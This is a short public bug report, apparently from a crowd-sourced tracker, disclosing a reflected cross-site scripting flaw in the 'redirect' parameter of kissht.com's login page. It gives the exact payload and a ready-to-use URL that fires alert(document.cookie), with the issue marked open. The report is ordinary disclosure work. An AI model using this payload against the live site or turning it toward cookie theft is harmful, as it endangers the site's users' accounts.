Bug on Kissht - Vulnerability Name : Cross Site Scripting - (on user login and signup entering page) Vulnerable URL : https://kissht.com/login?redirect=%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Vulnerable Parameter : redirect Vulnerable Payload : "hello"/><script>alert(document.cookie)</script> How to reproduce this issue: 1. Visit the url it will give an XSS popup. https://kissht.com/login?redirect=%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E POC : Screenshort can be found in the attachment.



Domain: https://kissht.com/login?redirect=%22hello%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Tweet Share

Reported on kissht.com

Total # of issues reported = 3

Reported by mrhacker14012001

Total Points of mrhacker14012001 = 13

Browser Version: 60.0

Operating System: Linux

OS Version:

Bug Type: Security
Status: open
Added on: May 16, 2019, 3:01 a.m.

Screenshot:



OCR Results:

OCR not installed

Comments:

No comment added yet. Be the first to comment!